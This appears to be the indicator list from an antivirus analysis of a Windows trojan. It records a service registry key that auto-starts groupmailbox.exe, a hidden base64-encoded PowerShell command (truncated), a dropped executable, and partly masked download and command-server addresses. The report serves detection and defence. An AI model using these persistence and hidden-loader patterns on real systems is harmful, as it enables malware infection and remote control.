Technical information
- [<HKLM>\System\CurrentControlSet\Services\groupmailbox] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\groupmailbox] 'ImagePath' = '"%WINDIR%\SysWOW64\groupmailbox.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...
- %HOMEPATH%\290.exe
- %HOMEPATH%\290.exe to %WINDIR%\syswow64\groupmailbox.exe
- http://bl####knetwork.com/wp-content/260shby-cdsu5t59-05/
- http://59.###.126.129:443/7rRLiKe6jXU3gYbT via 59.##5.126.129
- DNS ASK bl####knetwork.com
- '%HOMEPATH%\290.exe'
- '%WINDIR%\syswow64\groupmailbox.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAG0AeAB3AHQAbQBiAG4AZwBoAHYAdAA9ACcASQBkAHMAbAB0AGcAdgBvAHQAaAB2AGsAJwA7ACQAQgB0AGoAagB2AGMAcAB5AGQAdAAgAD0AIAAnADIAOQAwACcAOwAkAE0AagBsAHMAcQB3AHoAZABqAD0AJwBYAGcAZAB1AHgAcAB...' (with a hidden window)